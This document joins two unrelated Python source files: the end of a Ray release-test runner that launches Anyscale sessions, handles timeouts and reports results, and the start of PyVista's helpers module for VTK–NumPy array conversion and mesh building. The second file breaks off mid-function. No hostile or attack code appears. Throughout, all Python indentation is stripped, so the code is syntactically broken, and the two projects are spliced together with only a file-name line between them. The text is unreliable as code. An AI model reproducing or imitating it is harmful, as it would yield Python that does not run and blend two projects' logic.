if smoke_test:
script_args += ["--smoke-test"]
min_workers = 0
for node_type in compute_tpl["worker_node_types"]:
min_workers += node_type["min_workers"]
# Build completed, use job timeout
result_queue.put(State("CMD_RUN", time.time(), None))
returncode, logs = run_job(
cluster_name=session_name,
compute_tpl_name=compute_tpl_name,
cluster_env_name=app_config_name,
job_name=session_name,
min_workers=min_workers,
script=test_config["run"]["script"],
script_args=script_args,
env_vars=env_vars,
autosuspend=autosuspend_mins)
_process_finished_client_command(returncode, logs)
return
# Run release test command
cmd_to_run = test_config["run"]["script"] + " "
args = test_config["run"].get("args", [])
if args:
cmd_to_run += " ".join(args) + " "
if smoke_test:
cmd_to_run += " --smoke-test"
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=cmd_to_run,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_RUN")
if not kick_off_only:
_, runtime = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_RUN")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
runtime=runtime,
session_url=session_url,
commit_url=commit_url)
else:
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": ""
}))
except (ReleaseTestTimeoutError, Exception) as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = logs + "; Command logs:" + get_command_logs(
session_controller, scd_id,
test_config.get("log_lines", 50))
except Exception as e2:
logger.error(e2, exc_info=True)
# Long running tests are "finished" successfully when
# timed out
if isinstance(e, ReleaseTestTimeoutError) and is_long_running:
_process_finished_command(
session_controller=session_controller, scd_id=scd_id)
else:
timeout_type = ""
runtime = None
if isinstance(e, CommandTimeoutError):
timeout_type = "timeout"
runtime = 0
elif (isinstance(e, PrepareCommandTimeoutError)
or isinstance(e, FileSyncTimeoutError)
or isinstance(e, SessionTimeoutError)
or isinstance(e, PrepareCommandRuntimeError)
or isinstance(e, AppConfigBuildFailure)):
timeout_type = "infra_timeout"
runtime = None
elif isinstance(e, RuntimeError):
timeout_type = "runtime_error"
runtime = 0
else:
timeout_type = "unknown timeout"
runtime = None
# Add these metadata here to avoid changing SQL schema.
results = {}
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END", time.time(), {
"status": timeout_type,
"last_logs": logs,
"results": results
}))
finally:
if no_terminate:
logger.warning(
"`no_terminate` is set to True, so the session will "
"*not* be terminated!")
else:
_cleanup_session(sdk, session_id)
def _check_progress(logger):
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
should_terminate = False
session_id = None
scd_id = None
try:
existing_session = find_session_by_test_name(
sdk=sdk,
session_controller=session_controller,
temp_dir=temp_dir,
state_json=state_json,
project_id=project_id,
test_name=test_name)
if existing_session is None:
logger.info(f"Found no existing session for {test_name}")
result_queue.put(
State("END", time.time(), {
"status": "nosession",
"last_logs": ""
}))
return
session_id, session_name, session_state = existing_session
logger.info(f"Found existing session for {test_name}: "
f"{session_name}")
scd_id, success = get_latest_running_command_id(
sdk=sdk, session_id=session_id)
latest_result = get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
# Fetch result json and check if it has been updated recently
result_time_key = test_config["run"].get("time_key", None)
maximum_update_delay = test_config["run"].get(
"max_update_delay", None)
if result_time_key and maximum_update_delay:
last_update = latest_result.get(result_time_key, None)
if not last_update:
result_queue.put(
State(
"END", time.time(), {
"status": "error",
"last_logs": f"Test did not store "
f"{result_time_key} in the "
f"results json."
}))
return
delay = time.time() - last_update
logger.info(f"Last update was at {last_update:.2f}. "
f"This was {delay:.2f} seconds ago "
f"(maximum allowed: {maximum_update_delay})")
if delay > maximum_update_delay:
raise RuntimeError(
f"Test did not update the results json within "
f"the last {maximum_update_delay} seconds.")
if time.time() - session_state["start_time"] > timeout:
# Long running test reached timeout
logger.info(
f"Test command reached timeout after {timeout} seconds")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
elif success:
logger.info("All commands finished.")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
else:
rest_time = timeout - time.time() + session_state["start_time"]
logger.info(f"Test command should continue running "
f"for {rest_time} seconds")
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": "Test is still running"
}))
except Exception as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
logs += f"\n{str(e)}"
except Exception as e2:
logger.error(e2, exc_info=True)
result_queue.put(
State("END", time.time(), {
"status": "error",
"last_logs": logs
}))
should_terminate = True
finally:
if should_terminate:
logger.warning("Terminating session")
_cleanup_session(sdk, session_id)
if not check_progress:
process = multiprocessing.Process(target=_run, args=(logger, ))
else:
process = multiprocessing.Process(
target=_check_progress, args=(logger, ))
build_timeout = test_config["run"].get("build_timeout", 1800)
prepare_timeout = test_config["run"].get("prepare_timeout", timeout)
project_url = anyscale_project_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"])
logger.info(f"Link to project: {project_url}")
msg = f"This will now run test {test_name}."
if smoke_test:
msg += " This is a smoke test."
if is_long_running:
msg += " This is a long running test."
logger.info(msg)
logger.info(f"Starting process with timeout {timeout} "
f"(prepare timeout {prepare_timeout}, "
f"build timeout {build_timeout})")
process.start()
# The timeout time will be updated after the build finished
# Build = App config + compute template build and session start
timeout_time = time.time() + build_timeout
result = {}
while process.is_alive():
try:
state: State = result_queue.get(timeout=1)
except (Empty, TimeoutError):
if time.time() > timeout_time:
stop_event.set()
logger.warning("Process timed out.")
if not is_long_running:
logger.warning("Terminating process in 10 seconds.")
time.sleep(10)
logger.warning("Terminating process now.")
process.terminate()
else:
logger.info("Process is long running. Give 2 minutes to "
"fetch result and terminate.")
start_terminate = time.time()
while time.time(
) < start_terminate + 120 and process.is_alive():
time.sleep(1)
if process.is_alive():
logger.warning("Terminating forcefully now.")
process.terminate()
else:
logger.info("Long running results collected.")
break
continue
if not isinstance(state, State):
raise RuntimeError(f"Expected `State` object, got {result}")
if state.state == "CMD_PREPARE":
# Reset timeout after build finished
timeout_time = state.timestamp + prepare_timeout
if state.state == "CMD_RUN":
# Reset timeout after prepare command or build finished
timeout_time = state.timestamp + timeout
elif state.state == "END":
result = state.data
break
while not result_queue.empty():
state = result_queue.get_nowait()
result = state.data
logger.info("Final check if everything worked.")
try:
result.setdefault("status", "error (status not found)")
except (TimeoutError, Empty):
result = {"status": "timeout", "last_logs": "Test timed out."}
logger.info(f"Final results: {result}")
log_results_and_artifacts(result)
if not keep_results_dir:
logger.info(f"Removing results dir {temp_dir}")
shutil.rmtree(temp_dir)
else:
# Write results.json
with open(os.path.join(temp_dir, "results.json"), "wt") as fp:
json.dump(result, fp)
out_dir = os.path.expanduser(GLOBAL_CONFIG["RELEASE_RESULTS_DIR"])
logger.info(f"Moving results dir {temp_dir} to persistent location "
f"{out_dir}")
shutil.rmtree(out_dir, ignore_errors=True)
shutil.copytree(temp_dir, out_dir)
logger.info(f"Dir contents: {os.listdir(out_dir)}")
return result
def run_test(test_config_file: str,
test_name: str,
project_id: str,
commit_url: str,
category: str = "unspecified",
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress: bool = False,
report: bool = True,
keep_results_dir: bool = False,
session_name: Optional[str] = None,
app_config_id_override=None) -> Dict[str, Any]:
with open(test_config_file, "rt") as f:
test_configs = yaml.safe_load(f)
test_config_dict = {}
for test_config in test_configs:
name = test_config.pop("name")
test_config_dict[name] = test_config
if test_name not in test_config_dict:
raise ValueError(
f"Test with name `{test_name}` not found in test config file "
f"at `{test_config_file}`.")
test_config = test_config_dict[test_name]
if smoke_test and "smoke_test" in test_config:
smoke_test_config = test_config.pop("smoke_test")
test_config = _deep_update(test_config, smoke_test_config)
local_dir = os.path.dirname(test_config_file)
if "local_dir" in test_config:
# local_dir is relative to test_config_file
local_dir = os.path.join(local_dir, test_config["local_dir"])
if test_config["run"].get("use_connect"):
assert not kick_off_only, \
"--kick-off-only is unsupported when running with " \
"Anyscale connect."
assert not check_progress, \
"--check is unsupported when running with Anyscale connect."
if test_config.get("artifacts", {}):
logger.error(
"Saving artifacts are not yet supported when running with "
"Anyscale connect.")
# Perform necessary driver side setup.
driver_setup_script = test_config.get("driver_setup", None)
if driver_setup_script:
run_bash_script(local_dir, driver_setup_script)
result = run_test_config(
local_dir,
project_id,
test_name,
test_config,
commit_url,
session_name=session_name,
smoke_test=smoke_test,
no_terminate=no_terminate,
kick_off_only=kick_off_only,
check_progress=check_progress,
upload_artifacts=report,
keep_results_dir=keep_results_dir,
app_config_id_override=app_config_id_override)
status = result.get("status", "invalid")
if kick_off_only:
if status != "kickoff":
raise RuntimeError("Error kicking off test.")
logger.info("Kicked off test. It's now up to the `--check` "
"part of the script to track its process.")
return {}
else:
# `--check` or no kick off only
if status == "nosession":
logger.info(f"No running session found for test {test_name}, so "
f"assuming everything is fine.")
return {}
if status == "kickoff":
logger.info(f"Test {test_name} is still running.")
return {}
last_logs = result.get("last_logs", "No logs.")
test_suite = os.path.basename(test_config_file).replace(".yaml", "")
report_kwargs = dict(
test_suite=test_suite,
test_name=test_name,
status=status,
last_logs=last_logs,
results=result.get("results", {}),
artifacts=result.get("artifacts", {}),
category=category,
)
if not has_errored(result):
# Check if result are met if test succeeded
alert = maybe_get_alert_for_result(report_kwargs)
if alert:
# If we get an alert, the test failed.
logger.error(f"Alert has been raised for "
f"{test_suite}/{test_name} "
f"({category}): {alert}")
result["status"] = "error (alert raised)"
report_kwargs["status"] = "error (alert raised)"
# For printing/reporting to the database
report_kwargs["last_logs"] = alert
last_logs = alert
else:
logger.info(f"No alert raised for test "
f"{test_suite}/{test_name} "
f"({category}) - the test successfully passed!")
if report:
report_result(**report_kwargs)
else:
logger.info(f"Usually I would now report the following results:\n"
f"{report_kwargs}")
if has_errored(result):
raise RuntimeError(last_logs)
return report_kwargs
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
"--test-config", type=str, required=True, help="Test config file")
parser.add_argument("--test-name", type=str, help="Test name in config")
parser.add_argument(
"--ray-wheels", required=False, type=str, help="URL to ray wheels")
parser.add_argument(
"--no-terminate",
action="store_true",
default=False,
help="Don't terminate session after failure")
parser.add_argument(
"--report",
action="store_true",
default=False,
help="Do not report any results or upload to S3")
parser.add_argument(
"--kick-off-only",
action="store_true",
default=False,
help="Kick off only (don't wait for command to finish)")
parser.add_argument(
"--check",
action="store_true",
default=False,
help="Check (long running) status")
parser.add_argument(
"--keep-results-dir",
action="store_true",
default=False,
help="Keep results in directory (named RELEASE_RESULTS_DIR), e.g. "
"for Buildkite artifact upload.")
parser.add_argument(
"--category",
type=str,
default="unspecified",
help="Category name, e.g. `release-1.3.0` (will be saved in database)")
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing")
parser.add_argument(
"--session-name",
required=False,
type=str,
help="Name of the session to run this test.")
parser.add_argument(
"--app-config-id-override",
required=False,
type=str,
help=("An app config ID, which will override the test config app "
"config."))
args, _ = parser.parse_known_args()
if not GLOBAL_CONFIG["ANYSCALE_PROJECT"]:
raise RuntimeError(
"You have to set the ANYSCALE_PROJECT environment variable!")
ray_wheels = args.ray_wheels or os.environ.get("RAY_WHEELS", "")
maybe_fetch_api_token()
if ray_wheels:
logger.info(f"Using Ray wheels provided from URL/commit: "
f"{ray_wheels}")
url = commit_or_url(str(ray_wheels))
logger.info(f"Resolved url link is: {url}")
# Overwrite with actual URL
os.environ["RAY_WHEELS"] = url
elif not args.check:
url = find_ray_wheels(
GLOBAL_CONFIG["RAY_REPO"],
GLOBAL_CONFIG["RAY_BRANCH"],
GLOBAL_CONFIG["RAY_VERSION"],
)
if not url:
raise RuntimeError(f"Could not find wheels for "
f"Ray {GLOBAL_CONFIG['RAY_VERSION']}, "
f"branch {GLOBAL_CONFIG['RAY_BRANCH']}")
# RAY_COMMIT is set by commit_or_url and find_ray_wheels
populate_wheels_sanity_check(os.environ.get("RAY_COMMIT", ""))
test_config_file = os.path.abspath(os.path.expanduser(args.test_config))
# Override it from the global variable.
report = GLOBAL_CONFIG["REPORT_RESULT"]
if report.lower() == "1" or report.lower() == "true":
report = True
else:
report = args.report
run_test(
test_config_file=test_config_file,
test_name=args.test_name,
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
commit_url=url,
category=args.category,
smoke_test=args.smoke_test,
no_terminate=args.no_terminate or args.kick_off_only,
kick_off_only=args.kick_off_only,
check_progress=args.check,
report=report,
session_name=args.session_name,
keep_results_dir=args.keep_results_dir,
app_config_id_override=args.app_config_id_override,
)
|
helpers.py
|
"""Supporting functions for polydata and grid objects."""
import os
import collections.abc
import enum
import logging
import signal
import sys
from threading import Thread
import threading
import traceback
from typing import Optional
import numpy as np
from pyvista import _vtk
import pyvista
from .fileio import from_meshio
from . import transformations
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = _vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = _vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = _vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = _vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a given numpy data type.
Corrects for string type mapping issues.
Parameters
----------
typ : numpy.dtype
Numpy data type.
Returns
-------
int
Integer type id specified in ``vtkType.h``
"""
typ = _vtk.get_vtk_array_type(typ)
# This handles a silly string type bug
if typ == 3:
return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array.
Parameters
----------
vtkarr_bint : vtk.vtkBitArray
VTK binary array.
Returns
-------
vtk.vtkCharArray
VTK char array.
Notes
-----
This performs a copy.
"""
vtkarr = _vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array.
Parameters
----------
vtk_id_list : vtk.vtkIdList
VTK ID list.
Returns
-------
numpy.ndarray
Array of IDs.
"""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Parameters
----------
arr : numpy.ndarray
Numpy string array to convert.
name : str, optional
Name to set the vtkStringArray to.
Returns
-------
vtkStringArray
VTK string array.
Notes
-----
Note that this is terribly inefficient. If you have ideas on how
to make this faster, please consider opening a pull request.
"""
if isinstance(arr, np.ndarray):
vtkarr = _vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=False, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
Parameters
----------
arr : np.ndarray or vtkDataArray
A numpy array or vtkDataArry to convert.
name : str, optional
The name of the data array for VTK.
deep : bool, optional
If input is numpy array then deep copy values.
array_type : int, optional
VTK array type ID as specified in specified in ``vtkType.h``.
Returns
-------
vtkDataArray, numpy.ndarray, or DataFrame
The converted array. If input is a :class:`numpy.ndarray` then
returns ``vtkDataArray`` or is input is ``vtkDataArray`` then
returns NumPy ``ndarray``.
"""
if arr is None:
return
if isinstance(arr, np.ndarray):
if arr.dtype is np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = _vtk.numpy_to_vtk(num_array=arr, deep=deep,
array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (_vtk.vtkDataArray, _vtk.vtkBitArray, _vtk.vtkStringArray)):
raise TypeError(f'Invalid input array type ({type(arr)}).')
# Handle booleans
if isinstance(arr, _vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, _vtk.vtkStringArray):
return convert_string_array(arr)
# Convert from vtkDataArry to NumPy
return _vtk.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
"""Return ``True`` if the object is a PyVista wrapped dataset.
Parameters
----------
obj : anything
Any object to test.
Returns
-------
bool
``True`` when the object is a :class:`pyvista.DataSet`.
"""
return isinstance(obj, (pyvista.DataSet, pyvista.MultiBlock))
def point_array(obj, name):
"""Return point array of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str
Name of the array.
Returns
-------
numpy.ndarray
Wrapped array.
"""
vtkarr = obj.GetPointData().GetAbstractArray(name)
return convert_array(vtkarr)
def field_array(obj, name):
"""Return field data of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str
Name of the array.
Returns
-------
numpy.ndarray
Wrapped array.
"""
vtkarr = obj.GetFieldData().GetAbstractArray(name)
return convert_array(vtkarr)
def cell_array(obj, name):
"""Return cell array of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str
Name of the array.
Returns
-------
numpy.ndarray
Wrapped array.
"""
vtkarr = obj.GetCellData().GetAbstractArray(name)
return convert_array(vtkarr)
def row_array(obj, name):
"""Return row array of a vtk object.
Parameters
----------
obj : vtk.vtkDataSet
PyVista or VTK dataset.
name : str
Name of the array.
Returns
-------
numpy.ndarray
Wrapped array.
"""
vtkarr = obj.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return a field association object for a given field type string.
Parameters
----------
field : str, FieldAssociation
Name of the field (e.g, ``'cell'``, ``'field'``, ``'point'``,
``'row'``).
Returns
-------
pyvista.FieldAssociation
Field association.
"""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r']:
field = FieldAssociation.ROW
else:
raise ValueError(f'Data field ({field}) not supported.')
elif isinstance(field, FieldAssociation):
pass
else:
raise ValueError(f'Data field ({field}) not supported.')
return field
def get_array(mesh, name, preference='cell', err=False) -> Optional[np.ndarray]:
"""Search point, cell and field data for an array.
Parameters
----------
mesh : pyvista.DataSet
Dataset to get the array from.
name : str
The name of the array to get the range.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``.
err : bool, optional
Whether to throw an error if array is not present.
Returns
-------
pyvista.pyvista_ndarray or ``None``
Requested array. Return ``None`` if there is no array
matching the ``name`` and ``err=False``.
"""
if isinstance(mesh, _vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
preference = parse_field_choice(preference)
if sum([array is not None for array in (parr, carr, farr)]) > 1:
if preference == FieldAssociation.CELL:
return carr
elif preference == FieldAssociation.POINT:
return parr
elif preference == FieldAssociation.NONE:
return farr
else:
raise ValueError(f'Data field ({preference}) not supported.')
if parr is not None:
return parr
elif carr is not None:
return carr
elif farr is not None:
return farr
elif err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return None
def get_array_association(mesh, name, preference='cell', err=False) -> FieldAssociation:
"""Return the array association.
Parameters
----------
mesh : Dataset
Dataset to get the array association from.
name : str
The name of the array.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``.
err : bool, optional
Boolean to control whether to throw an error if array is not
present.
Returns
-------
pyvista.FieldAssociation
Association of the array. If array is not present and ``err`` is
``False``, ``FieldAssociation.NONE`` is returned.
"""
if isinstance(mesh, _vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return FieldAssociation.ROW
# with multiple arrays, return the array preference if possible
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
arrays = [parr, carr, farr]
preferences = [FieldAssociation.POINT, FieldAssociation.CELL, FieldAssociation.NONE]
preference = parse_field_choice(preference)
if preference not in preferences:
raise ValueError(f'Data field ({preference}) not supported.')
matches = [pref for pref, array in zip(preferences, arrays) if array is not None]
# optionally raise if no match
if not matches:
if err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return FieldAssociation.NONE
# use preference if it applies
if preference in matches:
return preference
# otherwise return first in order of point -> cell -> field
return matches[0]
def vtk_points(points, deep=True):
"""Convert numpy array or array-like to a ``vtkPoints`` object.
Parameters
----------
points : numpy.ndarray or sequence
Points to convert. Should be 1 or 2 dimensional. Accepts a
single point or several points.
deep : bool, optional
Perform a deep copy of the array. Only applicable if
``points`` is a :class:`numpy.ndarray`.
Returns
-------
vtk.vtkPoints
The vtkPoints object.
Examples
--------
>>> import pyvista
>>> import numpy as np
>>> points = np.random.random((10, 3))
>>> vpoints = pyvista.vtk_points(points)
>>> vpoints # doctest:+SKIP
(vtkmodules.vtkCommonCore.vtkPoints)0x7f0c2e26af40
"""
points = np.asanyarray(points)
# verify is numeric
if not np.issubdtype(points.dtype, np.number):
raise TypeError('Points must be a numeric type')
# check dimensionality
if points.ndim == 1:
points = points.reshape(-1, 3)
elif points.ndim > 2:
raise ValueError('Dimension of ``points`` should be 1 or 2, not '
f'{points.ndim}')
# verify shape
if points.shape[1] != 3:
raise ValueError('Points array must contain three values per point. '
f'Shape is {points.shape} and should be (X, 3)')
# points must be contiguous
points = np.require(points, requirements=['C'])
vtkpts = _vtk.vtkPoints()
vtk_arr = _vtk.numpy_to_vtk(points, deep=deep)
vtkpts.SetData(vtk_arr)
return vtkpts
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
Assumes points are ordered as line segments and an even number of
points.
Parameters
----------
points : numpy.ndarray
Points representing line segments. An even number must be
given as every two vertices represent a single line
segment. For example, two line segments would be represented
as ``np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])``.
Returns
-------
pyvista.PolyData
PolyData with lines and cells.
Examples
--------
This example plots two line segments at right angles to each other.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> lines = pyvista.lines_from_points(points)
>>> lines.plot()
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[(2 * np.ones(n_lines, np.int_),
np.arange(0, n_points-1, step=2),
np.arange(1, n_points+1, step=2))]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected
segments. For example, two line segments would be represented
as ``np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])``.
close : bool, optional
If ``True``, close the line segments into a loop.
Returns
-------
pyvista.PolyData
PolyData with lines and cells.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> poly = pyvista.lines_from_points(points)
>>> poly.plot(line_width=5)
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points)-1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points)-1, 0]], axis=0)
poly.lines = cells
return poly
def make_tri_mesh(points, faces):
"""Construct a ``pyvista.PolyData`` mesh using points and faces arrays.
Construct a mesh from an Nx3 array of points and an Mx3 array of
triangle indices, resulting in a mesh with N vertices and M
triangles. This function does not require the standard VTK
"padding" column and simplifies mesh creation.
Parameters
----------
points : np.ndarray
Array of points with shape ``(N, 3)`` storing the vertices of the
triangle mesh.
faces : np.ndarray
Array of indices with shape ``(M, 3)`` containing the triangle
indices.
Returns
-------
pyvista.PolyData
PolyData instance containing the triangle mesh.
Examples
--------
This example discretizes the unit square into a triangle mesh with
nine vertices and eight faces.
>>> import numpy as np
>>> import pyvista
>>> points = np.array([[0, 0, 0], [0.5, 0, 0], [1, 0, 0], [0, 0.5, 0],
... [0.5, 0.5, 0], [1, 0.5, 0], [0, 1, 0], [0.5, 1, 0],
... [1, 1, 0]])
>>> faces = np.array([[0, 1, 4], [4, 7, 6], [2, 5, 4], [4, 5, 8],
... [0, 4, 3], [3, 4, 6], [1, 2, 4], [4, 8, 7]])
>>> tri_mesh = pyvista.make_tri_mesh(points, faces)
>>> tri_mesh.plot(show_edges=True, line_width=5)
"""
if points.shape[1] != 3:
raise ValueError("Points array should have shape (N, 3).")
if faces.ndim != 2 or faces.shape[1] != 3:
raise ValueError("Face array should have shape (M, 3).")
cells = np.empty((faces.shape[0], 4), dtype=faces.dtype)
cells[:, 0] = 3
cells[:, 1:] = faces
return pyvista.PolyData(points, cells)
def vector_poly_data(orig, vec):
"""Create a pyvista.PolyData object composed of vectors.
Parameters
----------
orig : numpy.ndarray
Array of vector origins.
vec : numpy.ndarray
Array of vectors.
Returns
-------
pyvista.PolyData
Mesh containing the ``orig`` points along with the
``'vectors'`` and ``'mag'`` point arrays representing the
vectors and magnitude of the the vectors at each point.
Examples
--------
Create basic vector field. This is a point cloud where each point
has a vector and magnitude attached to it.
>>> import pyvista
>>> import numpy as np
>>> x, y = np.meshgrid(np.linspace(-5,5,10),np.linspace(-5,5,10))
>>> points = np.vstack((x.ravel(), y.ravel(), np.zeros(x.size))).T
>>> u = x/np.sqrt(x**2 + y**2)
>>> v = y/np.sqrt(x**2 + y**2)
>>> vectors = np.vstack((u.ravel()**3, v.ravel()**3, np.zeros(u.size))).T
>>> pdata = pyvista.vector_poly_data(points, vectors)
>>> pdata.point_data.keys()
['vectors', 'mag']
Convert these to arrows and plot it.
>>> pdata.glyph(orient='vectors', scale='mag').plot()
"""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = _vtk.vtkPoints()
vpts.SetData(_vtk.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = _vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1)**0.5
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix): # pragma: no cover
"""Convert a vtk matrix to a numpy.ndarray.
DEPRECATED: Please use ``array_from_vtkmatrix``.
"""
# import needs to happen here to prevent a circular import
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``array_from_vtkmatrix``.')
def array_from_vtkmatrix(matrix):
"""Convert a vtk matrix to an array.
Parameters
----------
matrix : vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
The vtk matrix to be converted to a ``numpy.ndarray``.
Returned ndarray has shape (3, 3) or (4, 4) as appropriate.
Returns
-------
numpy.ndarray
Numpy array containing the data from ``matrix``.
"""
if isinstance(matrix, _vtk.vtkMatrix3x3):
shape = (3, 3)
elif isinstance(matrix, _vtk.vtkMatrix4x4):
shape = (4, 4)
else:
raise TypeError('Expected vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4 input,'
f' got {type(matrix).__name__} instead.')
array = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
array[i, j] = matrix.GetElement(i, j)
return array
def vtkmatrix_from_array(array):
"""Convert a ``numpy.ndarray`` or array-like to a vtk matrix.
Parameters
----------
array : numpy.ndarray or array-like
The array or array-like to be converted to a vtk matrix.
Shape (3, 3) gets converted to a ``vtk.vtkMatrix3x3``, shape (4, 4)
gets converted to a ``vtk.vtkMatrix4x4``. No other shapes are valid.
Returns
-------
vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
VTK matrix.
"""
array = np.asarray(array)
if array.shape == (3, 3):
matrix = _vtk.vtkMatrix3x3()
elif array.shape == (4, 4):
matrix = _vtk.vtkMatrix4x4()
else:
